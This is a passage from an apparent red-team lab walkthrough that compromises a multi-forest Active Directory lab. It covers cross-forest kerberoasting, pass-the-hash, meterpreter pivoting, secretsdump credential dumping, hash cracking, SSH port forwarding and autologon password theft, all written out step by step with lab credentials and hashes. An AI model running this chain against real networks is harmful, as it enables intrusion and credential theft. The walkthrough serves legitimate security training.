𝑠𝑒𝑡 𝑆𝑀𝐵𝐷𝑂𝑀𝐴𝐼𝑁 𝑒𝑙𝑠. 𝑐𝑜𝑟𝑝

𝑠𝑒𝑡 𝑆𝑀𝐵𝑈𝑆𝐸𝑅 𝑒𝑙𝑠 − 𝑎𝑑𝑚𝑖𝑛

𝑠𝑒𝑡 𝑆𝑀𝐵𝑃𝐴𝑆𝑆 𝑐𝑐5𝑒9𝑎𝑐𝑏𝑎𝑑1𝑏25𝑐9𝑎𝑎𝑑3𝑏435𝑏51404𝑒𝑒: 8645𝑒87𝑒2593507𝑐𝑓623𝑓3291𝑏1334𝑐2

Payload settings

𝑠𝑒𝑡 𝑝𝑎𝑦𝑙𝑜𝑎𝑑 𝑤𝑖𝑛𝑑𝑜𝑤𝑠/𝑥64/𝑚𝑒𝑡𝑒𝑟𝑝𝑟𝑒𝑡𝑒𝑟/𝑏𝑖𝑛𝑑_𝑡𝑐𝑝

𝑠𝑒𝑡 𝑅𝐻𝑂𝑆𝑇 10.10.1.3

File Operations

𝑢𝑝𝑙𝑜𝑎𝑑 𝑃𝑜𝑤𝑒𝑟𝑉𝑖𝑒𝑤_𝑑𝑒𝑣. 𝑝𝑠1 𝐶:\\𝑈𝑠𝑒𝑟𝑠\\𝑃𝑢𝑏𝑙𝑖𝑐\\𝑃𝑜𝑤𝑒𝑟𝑉𝑖𝑒𝑤_𝑑𝑒𝑣. 𝑝𝑠1

Using PowerView, we will enumerate any misconfigurations that we can find to abuse the cross-
forest trust established between “ELS.CORP” and “MGMT.CORP”.

With the following query, we will enumerate named services across the forest trust. It is possible to
perform kerberoasting across forest trusts, all we need is the TGS of a named account with SPN.

𝐼𝑚𝑝𝑜𝑟𝑡 − 𝑀𝑜𝑑𝑢𝑙𝑒 𝑃𝑜𝑤𝑒𝑟𝑉𝑖𝑒𝑤_𝑑𝑒𝑣. 𝑝𝑠1

𝑮𝒆𝒕 − 𝑵𝒆𝒕𝑫𝒐𝒎𝒂𝒊𝒏𝑻𝒓𝒖𝒔𝒕 | ? {$_. 𝑻𝒓𝒖𝒔𝒕𝑻𝒚𝒑𝒆 − 𝒏𝒆 ′𝑬𝒙𝒕𝒆𝒓𝒏𝒂𝒍′} | %{𝑮𝒆𝒕 − 𝑵𝒆𝒕𝑼𝒔𝒆𝒓 − 𝑺𝑷𝑵 − 𝑫𝒐𝒎𝒂𝒊𝒏 $_. 𝑻𝒂𝒓𝒈𝒆𝒕𝑵𝒂𝒎𝒆}

<..SNIP..>

𝑑𝑖𝑠𝑡𝑖𝑛𝑔𝑢𝑖𝑠ℎ𝑒𝑑𝑛𝑎𝑚𝑒 ∶ 𝐶𝑁 = 𝒔𝒑𝒏_𝒔𝒗𝒄, 𝑂𝑈 = 𝑆𝑃𝑁_𝑆𝑒𝑟𝑣𝑖𝑐𝑒, 𝐷𝐶 = 𝑚𝑔𝑚𝑡, 𝐷𝐶 = 𝑐𝑜𝑟𝑝

𝑑𝑖𝑠𝑝𝑙𝑎𝑦𝑛𝑎𝑚𝑒 ∶ 𝒔𝒑𝒏_𝒔𝒗𝒄
𝑢𝑠𝑒𝑟𝑝𝑟𝑖𝑛𝑐𝑖𝑝𝑎𝑙𝑛𝑎𝑚𝑒 ∶ 𝒔𝒑𝒏_𝒔𝒗𝒄@𝒎𝒈𝒎𝒕. 𝒄𝒐𝒓𝒑
𝑛𝑎𝑚𝑒 ∶ 𝒔𝒑𝒏_𝒔𝒗𝒄
𝑠𝑒𝑟𝑣𝑖𝑐𝑒𝑝𝑟𝑖𝑛𝑐𝑖𝑝𝑎𝑙𝑛𝑎𝑚𝑒 ∶ {𝒉𝒕𝒕𝒑/𝒎𝒈𝒎𝒕 − 𝒅𝒄. 𝒎𝒈𝒎𝒕. 𝒄𝒐𝒓𝒑, 𝒉𝒕𝒕𝒑/𝒎𝒈𝒎𝒕 − 𝒅𝒄}
𝑜𝑏𝑗𝑒𝑐𝑡𝑠𝑖𝑑 ∶ 𝑆 − 1 − 5 − 21 − 3658202825 − 2428483480 − 107650130 − 1106
𝑠𝑎𝑚𝑎𝑐𝑐𝑜𝑢𝑛𝑡𝑛𝑎𝑚𝑒 ∶ 𝒔𝒑𝒏_𝒔𝒗𝒄

<../SNIP..>

15
It can be clearly seen that a domain user of the MGMT domain “spn_svc” has an SPN set, it is
possible to retrieve the service ticket hash, as follows:

𝑅𝑒𝑞𝑢𝑒𝑠𝑡 − 𝑆𝑃𝑁𝑇𝑖𝑐𝑘𝑒𝑡 − 𝑆𝑃𝑁 ℎ𝑡𝑡𝑝/𝑚𝑔𝑚𝑡 − 𝑑𝑐. 𝑚𝑔𝑚𝑡. 𝑐𝑜𝑟𝑝 − 𝑣𝑒𝑟𝑏𝑜𝑠𝑒

<..SNIP..>

𝑆𝑎𝑚𝐴𝑐𝑐𝑜𝑢𝑛𝑡𝑁𝑎𝑚𝑒 ∶ 𝑈𝑁𝐾𝑁𝑂𝑊𝑁
𝐷𝑖𝑠𝑡𝑖𝑛𝑔𝑢𝑖𝑠ℎ𝑒𝑑𝑁𝑎𝑚𝑒 ∶ 𝑈𝑁𝐾𝑁𝑂𝑊𝑁
𝑆𝑒𝑟𝑣𝑖𝑐𝑒𝑃𝑟𝑖𝑛𝑐𝑖𝑝𝑎𝑙𝑁𝑎𝑚𝑒 ∶ 𝒉𝒕𝒕𝒑/𝒎𝒈𝒎𝒕 − 𝒅𝒄. 𝒎𝒈𝒎𝒕. 𝒄𝒐𝒓𝒑
𝑇𝑖𝑐𝑘𝑒𝑡𝐵𝑦𝑡𝑒𝐻𝑒𝑥𝑆𝑡𝑟𝑒𝑎𝑚 ∶

𝐻𝑎𝑠ℎ ∶ $𝑘𝑟𝑏5𝑡𝑔𝑠$23$ ∗ 𝑈𝑁𝐾𝑁𝑂𝑊𝑁$𝑈𝑁𝐾𝑁𝑂𝑊𝑁$ℎ𝑡𝑡𝑝/𝑚𝑔𝑚𝑡 − 𝑑𝑐. 𝑚𝑔𝑚𝑡. 𝑐𝑜𝑟𝑝 ∗ $9𝐸𝐸

𝐸528138𝐹𝐹481𝐷𝐴𝐶208𝐴40𝐷7𝐸4𝐸82𝐵$𝐶𝐴𝐹6𝐶38136𝐷32𝐶4𝐹2𝐶32𝐶77𝐴9𝐷
35520𝐹68𝐴3𝐸647𝐹𝐵3875𝐸03𝐸𝐶06776968923𝐹1𝐴324𝐴59𝐷𝐷9𝐵11980𝐷𝐵
𝐴5𝐹2𝐷849170𝐸3𝐴𝐴20146𝐸9𝐸72𝐵9𝐷2𝐸𝐷765𝐸48𝐴2𝐵00750𝐷𝐸28𝐷𝐵𝐴1834
31513𝐸𝐹085𝐶8𝐶𝐸9𝐶𝐴𝐷𝐵𝐶𝐶3𝐵𝐷4𝐷0937𝐴3195940𝐴6𝐹39𝐸45𝐶583𝐵1𝐹𝐹𝐵𝐵
𝐴𝐵56006𝐶5𝐶𝐶51041𝐵0𝐴𝐷9𝐴8𝐹6𝐶5𝐴63𝐹5𝐸𝐴61𝐸𝐸𝐷𝐸𝐵4𝐹1𝐴𝐵66525𝐴42𝐹8
𝐶𝐶6708𝐷8𝐵𝐶𝐷36𝐸𝐶6𝐹𝐷𝐸350𝐶𝐹2𝐵78𝐶𝐸𝐷𝐹𝐶8𝐸𝐵𝐸82𝐷𝐸2𝐵𝐸302𝐴47921𝐴𝐵9
𝐸9486897𝐷𝐸658𝐵9𝐹1𝐴𝐹037𝐴4𝐴𝐸𝐴𝐵4491455𝐶𝐸𝐷𝐷𝐷5𝐴𝐷2𝐴67𝐷07𝐵502𝐵𝐶
𝐷𝐶2𝐷𝐴136𝐸48𝐵6𝐷966391𝐵𝐵70𝐵72846𝐷𝐶3310𝐶𝐴1𝐴𝐹6𝐴3𝐹𝐴6𝐹693𝐷𝐷𝐹19
8𝐸389𝐶6𝐹0𝐹𝐹𝐸4𝐸𝐸0𝐶𝐹63242𝐵2𝐴1𝐴𝐹𝐵7𝐸902𝐹𝐶𝐹8680𝐵197𝐵64𝐶4𝐹295𝐹
𝐷803𝐶03𝐷𝐵𝐸𝐹35𝐹670𝐷𝐴9769𝐷0𝐶𝐷9487819𝐵6𝐵2𝐹𝐸0𝐶0231𝐴𝐵0544𝐷3

<../SNIP..>

To extract only the Hash part from the SPN output, we will filter it out and export the hash as
follows:

𝐼𝑛𝑣𝑜𝑘𝑒 − 𝐾𝑒𝑟𝑏𝑒𝑟𝑜𝑎𝑠𝑡 − 𝐷𝑜𝑚𝑎𝑖𝑛 𝑚𝑔𝑚𝑡. 𝑐𝑜𝑟𝑝 | % { $_. 𝐻𝑎𝑠ℎ } | 𝑂𝑢𝑡 − 𝐹𝑖𝑙𝑒 − 𝐸𝑛𝑐𝑜𝑑𝑖𝑛𝑔 𝐴𝑆𝐶𝐼𝐼 ℎ𝑎𝑠ℎ𝑒𝑠. 𝑘𝑒𝑟𝑏𝑒𝑟𝑜𝑎𝑠𝑡

→ B64 file transfer:

$𝑓𝑖𝑙𝑒 = "𝐶:\𝑈𝑠𝑒𝑟𝑠\𝑃𝑢𝑏𝑙𝑖𝑐\ℎ𝑎𝑠ℎ𝑒𝑠. 𝑘𝑒𝑟𝑏𝑒𝑟𝑜𝑎𝑠𝑡"

$𝑏𝑎 = [𝑆𝑦𝑠𝑡𝑒𝑚. 𝑖𝑜. 𝑓𝑖𝑙𝑒]: : 𝑅𝑒𝑎𝑑𝑎𝑙𝑙𝐵𝑦𝑡𝑒𝑠($𝑓𝑖𝑙𝑒)

$𝑠𝑡𝑟 = [𝑆𝑦𝑠𝑡𝑒𝑚. 𝑐𝑜𝑛𝑣𝑒𝑟𝑡]: : 𝑡𝑜𝑏𝑎𝑠𝑒64𝑠𝑡𝑟𝑖𝑛𝑔($𝑏𝑎)

$𝑠𝑡𝑟

→ On your attacking machine:

𝑒𝑐ℎ𝑜 “𝑏𝑎𝑠𝑒64_𝑓𝑜𝑟𝑚𝑎𝑡” | 𝑏𝑎𝑠𝑒64 − 𝑑 > ℎ𝑎𝑠ℎ𝑒𝑠. 𝑘𝑒𝑟𝑏𝑒𝑟𝑜𝑎𝑠𝑡

𝑗𝑜ℎ𝑛 − −𝑤𝑜𝑟𝑑𝑙𝑖𝑠𝑡 =/𝑢𝑠𝑟/𝑠ℎ𝑎𝑟𝑒/𝑤𝑜𝑟𝑑𝑙𝑖𝑠𝑡𝑠/𝑟𝑜𝑐𝑘𝑦𝑜𝑢. 𝑡𝑥𝑡 ℎ𝑎𝑠ℎ𝑒𝑠. 𝑘𝑒𝑟𝑏𝑒𝑟𝑜𝑎𝑠𝑡

16
The service account credentials (‘spn_svc’) are extracted using a brute-forcing technique.

Credentials: “spn_svc\B@DB!tch”

The Domain user “spn_svc” of “MGMT.corp” is also a member of the administrator’s group in the
MGMT-DC domain controller.

The IP address of MGMT-DC can be found using a simple ping command or a nslookup DNS query
[10.10.3.2]

17
4 MGMT-DC Server

On the current meterpreter session add a route to the “10.10.3.0.24” network and then start a socks
server to access MGMT-DC.mgmt.corp.

Perform the following actions to establish a persistent shell on MGMT-DC server.

add route 10.10.3.0/24 <session_id>

Start SOCKS server to route traffic from the established meterpreter shell

use auxiliary/server/socks4a
set SRVHOST 172.16.25.x
run -j

Modify the proxychains.conf file

nano /etc/proxychains.conf
socks4 172.16.25.x 1080

Add to host file

nano /etc/hosts

10.10.3.2 MGMT-DC.MGMT.CORP

Now get access to “MGMT-DC.mgmt.corp” leveraging impacket’s psexec.py script.

𝑝𝑟𝑜𝑥𝑦𝑐ℎ𝑎𝑖𝑛𝑠 𝑝𝑠𝑒𝑥𝑒𝑐. 𝑝𝑦 − 𝑑𝑒𝑏𝑢𝑔 − 𝑑𝑐 − 𝑖𝑝 10.10.3.2 𝑠𝑝𝑛_𝑠𝑣𝑐@𝑀𝐺𝑀𝑇 − 𝐷𝐶. 𝑀𝐺𝑀𝑇. 𝐶𝑂𝑅𝑃

NOTE: Enter “B@DB!tch” as password

Switch to PowerShell

We will use the Active Directory Module present in the server to list the OU present in the MGMT-
DC and all the members present in the available OU’s.

18
 LIST all OU’s in MGMT.CORP

𝐼𝑚𝑝𝑜𝑟𝑡 − 𝑀𝑜𝑑𝑢𝑙𝑒 𝐴𝑐𝑡𝑖𝑣𝑒𝐷𝑖𝑟𝑒𝑐𝑡𝑜𝑟𝑦

𝐺𝑒𝑡 − 𝐴𝐷𝑂𝑏𝑗𝑒𝑐𝑡 − 𝐹𝑖𝑙𝑡𝑒𝑟 {𝑂𝑏𝑗𝑒𝑐𝑡𝐶𝑙𝑎𝑠𝑠 − 𝑒𝑞 ‘𝑜𝑟𝑔𝑎𝑛𝑖𝑧𝑎𝑡𝑖𝑜𝑛𝑎𝑙𝑢𝑛𝑖𝑡’} − 𝑃𝑟𝑜𝑝𝑒𝑟𝑡𝑖𝑒𝑠 𝐶𝑎𝑛𝑜𝑛𝑖𝑐𝑎𝑙𝑁𝑎𝑚𝑒 | 𝑆𝑒𝑙𝑒𝑐𝑡 − 𝑂𝑏𝑗𝑒𝑐𝑡 𝐷𝑖𝑠𝑡𝑖𝑛𝑔𝑢𝑖𝑠ℎ𝑒𝑑𝑁𝑎𝑚𝑒

Get Members of “Bastion-Host” OU

$𝑜𝑢𝑝𝑎𝑡ℎ = “𝑂𝑈 = 𝐵𝑎𝑠𝑡𝑖𝑜𝑛 − 𝐻𝑜𝑠𝑡, 𝐷𝐶 = 𝑚𝑔𝑚𝑡, 𝐷𝐶 = 𝑐𝑜𝑟𝑝”

𝐺𝑒𝑡 − 𝐴𝐷𝑈𝑠𝑒𝑟 − 𝐹𝑖𝑙𝑡𝑒𝑟 ∗ −𝑆𝑒𝑎𝑟𝑐ℎ𝐵𝑎𝑠𝑒 $𝑜𝑢𝑝𝑎𝑡ℎ

(𝑗𝑢𝑚𝑝 − 𝑎𝑑𝑚𝑖𝑛 𝑢𝑠𝑒𝑟 𝑑𝑖𝑠𝑐𝑜𝑣𝑒𝑟𝑒𝑑 )

The Domain user “Jump-Admin” present in the “Bastion-Host” OU can be useful in moving forward
from the MGMT-DC server. The IP address of “jump-srv” server can be enumerated by actively
querying the DNS record.

𝑛𝑠𝑙𝑜𝑜𝑘𝑢𝑝 𝑗𝑢𝑚𝑝 − 𝑠𝑟𝑣

<..SNIP..>

Name: jump-srv.mgmt.corp
IP Address: 10.10.3.3

<../SNIP..>

However, we will extract all the credentials present in the MGMT.CORP domain leveraging
impacket’s sercretsdump.py script.

On a new bash prompt using our route to the internal network [10.10.3.0/24], we will execute
secretsdump.py as follows:

𝑝𝑟𝑜𝑥𝑦𝑐ℎ𝑎𝑖𝑛𝑠 𝑠𝑒𝑐𝑟𝑒𝑡𝑠𝑑𝑢𝑚𝑝. 𝑝𝑦 − 𝑑𝑒𝑏𝑢𝑔 − 𝑑𝑐 − 𝑖𝑝 10.10.3.2 𝑠𝑝𝑛_𝑠𝑣𝑐@𝑀𝐺𝑀𝑇 − 𝐷𝐶. 𝑀𝐺𝑀𝑇. 𝐶𝑂𝑅𝑃

[..SNIP..]

𝒎𝒈𝒎𝒕 − 𝒂𝒅𝒎𝒊𝒏: 500: 𝑎𝑎𝑑3𝑏435𝑏51404𝑒𝑒𝑎𝑎𝑑3𝑏435𝑏51404𝑒𝑒: 86𝑐64𝑎256𝑒8𝑎𝑒𝑏2𝑒𝑑𝑓31𝑏4157𝑏𝑓6𝑏𝑒𝑐𝑏: : :

𝒌𝒓𝒃𝒕𝒈𝒕: 502: 𝑎𝑎𝑑3𝑏435𝑏51404𝑒𝑒𝑎𝑎𝑑3𝑏435𝑏51404𝑒𝑒: 2𝑎7𝑎0𝑓537983𝑏𝑎𝑐4120725𝑑055𝑓𝑐𝑏𝑏𝑎9: : :
𝒎𝒈𝒎𝒕. 𝒄𝒐𝒓𝒑\𝒋𝒖𝒎𝒑 − 𝒂𝒅𝒎𝒊𝒏: 1104: 𝑎𝑎𝑑3𝑏435𝑏51404𝑒𝑒𝑎𝑎𝑑3𝑏435𝑏51404𝑒𝑒: 𝟐𝒅𝒄𝟗𝒃𝒇𝒇𝟑𝟗𝟕𝒇𝟗𝒆𝟔𝒄𝟗𝒇𝟎𝟖𝒂𝟎𝟓𝒃𝟏𝟖𝟏𝟒𝟓𝒂𝟕𝒃𝟔: : :
𝒎𝒈𝒎𝒕. 𝒄𝒐𝒓𝒑\𝒔𝒑𝒏_𝒔𝒗𝒄: 1106: 𝑎𝑎𝑑3𝑏435𝑏51404𝑒𝑒𝑎𝑎𝑑3𝑏435𝑏51404𝑒𝑒: 2𝑑𝑐9𝑏𝑓𝑓397𝑓9𝑒6𝑐9𝑓08𝑎05𝑏18145𝑎7𝑏6: : :

[..SNIP..]

Crack the “jump-admin” hash using JTR [John] by storing the NT hash in a file.

19
 → Crack jump-admin hash(2dc9bff397f9e6c9f08a05b18145a7b6):

Copy the hash “2dc9bff397f9e6c9f08a05b18145a7b6” in jump-adminpass.txt file

𝑗𝑜ℎ𝑛 − −𝑓𝑜𝑟𝑚𝑎𝑡 = 𝑁𝑇 𝑗𝑢𝑚𝑝 − 𝑎𝑑𝑚𝑖𝑛𝑝𝑎𝑠𝑠. 𝑡𝑥𝑡 − 𝑤 =/𝑢𝑠𝑟/𝑠ℎ𝑎𝑟𝑒/𝑤𝑜𝑟𝑑𝑙𝑖𝑠𝑡𝑠/𝑟𝑜𝑐𝑘𝑦𝑜𝑢. 𝑡𝑥𝑡

The hash is cracked and we now have clear text credentials of the “jump-admin” user at the “Jump-
Admin” machine.

We will now perform port scanning against the newly discovered IP address.

20
5 Jump-Srv

Let’s perform a TCP port scan against the target 10.10.3.3 [jump-srv.mgmt.corp] using nmap and
leveraging the route to the 10.10.3.0/24 network.

Using meterpreter’s active route to “10.10.3.0/24” network on new bash shell

𝑝𝑟𝑜𝑥𝑦𝑐ℎ𝑎𝑖𝑛𝑠 𝑛𝑚𝑎𝑝 − −𝑡𝑜𝑝 − 𝑝𝑜𝑟𝑡𝑠 10 − 𝑠𝑇 − 𝑠𝑉 − 𝑃𝑛 10.10.3.3

<..SNIP..>

𝑁𝑚𝑎𝑝 𝑠𝑐𝑎𝑛 𝑟𝑒𝑝𝑜𝑟𝑡 𝑓𝑜𝑟 10.10.3.3

𝐻𝑜𝑠𝑡 𝑖𝑠 𝑢𝑝 (2.4𝑠 𝑙𝑎𝑡𝑒𝑛𝑐𝑦).

𝑃𝑂𝑅𝑇 𝑆𝑇𝐴𝑇𝐸 𝑆𝐸𝑅𝑉𝐼𝐶𝐸 𝑉𝐸𝑅𝑆𝐼𝑂𝑁

21/𝑡𝑐𝑝 𝑐𝑙𝑜𝑠𝑒𝑑 𝑓𝑡𝑝
𝟐𝟐/𝒕𝒄𝒑 𝒐𝒑𝒆𝒏 𝒔𝒔𝒉 𝑶𝒑𝒆𝒏𝑺𝑺𝑯 𝟕. 𝟐𝒑𝟐 𝑼𝒃𝒖𝒏𝒕𝒖 𝟒𝒖𝒃𝒖𝒏𝒕𝒖𝟐. 𝟖 (𝑼𝒃𝒖𝒏𝒕𝒖 𝑳𝒊𝒏𝒖𝒙; 𝒑𝒓𝒐𝒕𝒐𝒄𝒐𝒍 𝟐. 𝟎)
23/𝑡𝑐𝑝 𝑐𝑙𝑜𝑠𝑒𝑑 𝑡𝑒𝑙𝑛𝑒𝑡
25/𝑡𝑐𝑝 𝑐𝑙𝑜𝑠𝑒𝑑 𝑠𝑚𝑡𝑝
80/𝑡𝑐𝑝 𝑐𝑙𝑜𝑠𝑒𝑑 ℎ𝑡𝑡𝑝
110/𝑡𝑐𝑝 𝑐𝑙𝑜𝑠𝑒𝑑 𝑝𝑜𝑝3

<..SNIP..>

SSH server is running on TCP port 22. As ‘jump-srv.mgmt.corp’ machine is managed by “jump-
admin”, we can try to do SSH to ‘10.10.3.3’ machine using Jump-Admin Domain user.

Perform SSH to 10.10.3.3 as jump-admin domain user.

𝑝𝑟𝑜𝑥𝑦𝑐ℎ𝑎𝑖𝑛𝑠 𝑠𝑠ℎ − 𝑙 𝑗𝑢𝑚𝑝 − 𝑎𝑑𝑚𝑖𝑛@𝑀𝐺𝑀𝑇. 𝐶𝑂𝑅𝑃 10.10.3.3

NOTE: enter jump-admin cracked password ‘B@DB!tch’

We successfully SSHed to Jump-SRV.mgmt.corp as the “jump-admin” domain user.

21
Let’s also extract the bookmark URLs of Firefox in this machine and look if any interesting information can
be found (as jump-admin user).

As ‘Jump-admin’ domain user

𝑐𝑑 /. 𝑚𝑜𝑧𝑖𝑙𝑙𝑎/𝑓𝑖𝑟𝑒𝑓𝑜𝑥/2𝑠3𝑝6𝑚1𝑣. 𝑑𝑒𝑓𝑎𝑢𝑙𝑡 − 𝑟𝑒𝑙𝑒𝑎𝑠𝑒

𝑠𝑞𝑙𝑖𝑡𝑒3 𝑝𝑙𝑎𝑐𝑒𝑠. 𝑠𝑞𝑙𝑖𝑡𝑒

Inside SQLite

. 𝑡𝑎𝑏𝑙𝑒𝑠
𝑠𝑒𝑙𝑒𝑐𝑡 𝑚𝑜𝑧_𝑝𝑙𝑎𝑐𝑒𝑠. 𝑢𝑟𝑙 𝑓𝑟𝑜𝑚 𝑚𝑜𝑧_𝑝𝑙𝑎𝑐𝑒𝑠;
. 𝑞𝑢𝑖𝑡

𝑓𝑜𝑢𝑛𝑑 𝑈𝑅𝐿: 𝒉𝒕𝒕𝒑𝒔://𝒂𝒅𝒎𝒊𝒏 − 𝒔𝒚𝒔. 𝒔𝒊𝒕𝒆/𝒍𝒐𝒈𝒊𝒏. 𝒂𝒔𝒑? 𝒖𝒔𝒆𝒓 = 𝒔𝒚𝒔 − 𝒂𝒅𝒎𝒊𝒏&𝒑𝒂𝒔𝒔 = 𝑹𝒂𝒏𝒅𝟎𝒎𝒍𝒚𝑺𝟑𝒍𝟑𝒄𝒕𝒆𝒅𝑷@𝒔𝒔

However, using Firefox with proxychains to query the login URL shows that it is non-existent. Now
enumerate the IP address of the admin-sys server by pinging the URL.

𝑝𝑖𝑛𝑔 𝒂𝒅𝒎𝒊𝒏 − 𝒔𝒚𝒔. 𝒔𝒊𝒕𝒆

Discovered IP address [192.168.1.2]

Performing a TCP port scan against the “192.168.1.2” target reveals that the 5985 port is open,
which means one can always do PowerShell Remoting.

22
6 Admin-SYS

In order to perform PowerShell Remoting, we need to apply some port forwarding techniques.

Exit the SSH session and re-establish a new session with port forwarding switches.

Using port forwarding, we are specifying that all the traffic sent locally will be forwarded to the
‘admin-sys’ server [192.168.1.2]

On a new bash session

𝑝𝑟𝑜𝑥𝑦𝑐ℎ𝑎𝑖𝑛𝑠 𝑠𝑠ℎ − 𝑙 𝑗𝑢𝑚𝑝 − 𝑎𝑑𝑚𝑖𝑛@𝑀𝐺𝑀𝑇. 𝐶𝑂𝑅𝑃 10.10.3.3 − 𝐿 5985: 192.168.1.2: 5985

(Now at this very particular point, traffic from your attacker machine can reach the admin-sys machine)

Use Evil-WinRM to connect to 192.168.1.2 machine with the discovered credentials

./𝑒𝑣𝑖𝑙 − 𝑤𝑖𝑛𝑟𝑚. 𝑟𝑏 − 𝑖 127.0.0.1 − 𝑢 𝑠𝑦𝑠 − 𝑎𝑑𝑚𝑖𝑛 − 𝑝 𝑅𝑎𝑛𝑑0𝑚𝑙𝑦𝑆3𝑙3𝑐𝑡𝑒𝑑𝑃@𝑠𝑠

Enumerating the environment reveals that “sys-admin” is a local user at the admin-sys server.
Privilege escalation can be done by querying the autologin registry.

Clear Text credentials of Administrator are found.

23
 On the recently established WinRM session

𝑟𝑒𝑔 𝑞𝑢𝑒𝑟𝑦 "𝐻𝐾𝐿𝑀\𝑆𝑂𝐹𝑇𝑊𝐴𝑅𝐸\𝑀𝑖𝑐𝑟𝑜𝑠𝑜𝑓𝑡\𝑊𝑖𝑛𝑑𝑜𝑤𝑠 𝑁𝑇\𝐶𝑢𝑟𝑟𝑒𝑛𝑡𝑣𝑒𝑟𝑠𝑖𝑜𝑛\𝑊𝑖𝑛𝑙𝑜𝑔𝑜𝑛"

<..SNIP..>

𝐻𝐾𝐸𝑌_𝐿𝑂𝐶𝐴𝐿_𝑀𝐴𝐶𝐻𝐼𝑁𝐸\𝑆𝑂𝐹𝑇𝑊𝐴𝑅𝐸\𝑀𝑖𝑐𝑟𝑜𝑠𝑜𝑓𝑡\𝑊𝑖𝑛𝑑𝑜𝑤𝑠 𝑁𝑇\𝐶𝑢𝑟𝑟𝑒𝑛𝑡𝑣𝑒𝑟𝑠𝑖𝑜𝑛\𝑊𝑖𝑛𝑙𝑜𝑔𝑜𝑛
𝐴𝑢𝑡𝑜𝑅𝑒𝑠𝑡𝑎𝑟𝑡𝑆ℎ𝑒𝑙𝑙 𝑅𝐸𝐺_𝐷𝑊𝑂𝑅𝐷 0𝑥1
𝐵𝑎𝑐𝑘𝑔𝑟𝑜𝑢𝑛𝑑 𝑅𝐸𝐺_𝑆𝑍 0 0 0
𝐶𝑎𝑐ℎ𝑒𝑑𝐿𝑜𝑔𝑜𝑛𝑠𝐶𝑜𝑢𝑛𝑡 𝑅𝐸𝐺_𝑆𝑍 10
𝐷𝑒𝑏𝑢𝑔𝑆𝑒𝑟𝑣𝑒𝑟𝐶𝑜𝑚𝑚𝑎𝑛𝑑 𝑅𝐸𝐺_𝑆𝑍 𝑛𝑜
𝐷𝑒𝑓𝑎𝑢𝑙𝑡𝑈𝑠𝑒𝑟𝑁𝑎𝑚𝑒 𝑅𝐸𝐺_𝑆𝑍 𝑨𝒅𝒎𝒊𝒏𝒊𝒔𝒕𝒓𝒂𝒕𝒐𝒓
𝐷𝑒𝑓𝑎𝑢𝑙𝑡𝐷𝑜𝑚𝑎𝑖𝑛𝑁𝑎𝑚𝑒 𝑅𝐸𝐺_𝑆𝑍 𝑊𝐼𝑁 − 10 − 𝑃𝑅𝑂 − 𝑋64
𝐴𝑢𝑡𝑜𝐴𝑑𝑚𝑖𝑛𝐿𝑜𝑔𝑜𝑛 𝑅𝐸𝐺_𝑆𝑍 1
𝐷𝑒𝑓𝑎𝑢𝑙𝑡𝑃𝑎𝑠𝑠𝑤𝑜𝑟𝑑 𝑅𝐸𝐺_𝑆𝑍 𝑻𝒆𝒔𝒕@𝟏𝟐𝟑

<..SNIP..>

Reconnect to the ‘admin-sys’ server with local administrator credentials.

./𝑒𝑣𝑖𝑙 − 𝑤𝑖𝑛𝑟𝑚. 𝑟𝑏 − 𝑖 127.0.0.1 − 𝑢 𝐴𝑑𝑚𝑖𝑛𝑖𝑠𝑡𝑟𝑎𝑡𝑜𝑟 − 𝑝 𝑇𝑒𝑠𝑡@123

𝑡𝑦𝑝𝑒 𝐶:\𝑈𝑠𝑒𝑟𝑠\𝐴𝑑𝑚𝑖𝑛𝑖𝑠𝑡𝑟𝑎𝑡𝑜𝑟\𝐷𝑒𝑠𝑘𝑡𝑜𝑝\𝑇𝑟𝑖𝑢𝑚𝑝ℎ. 𝑡𝑥𝑡

<Result>

CONGRATULATIONS, YOU HAVE SUCCESSFULLY COMPROMISED MULTI-FOREST RED TEAM ENVIRONMENT!!

<3

</Result>

Congratulations!!

The Multi-Forest Red Team Environment is successfully compromised.

24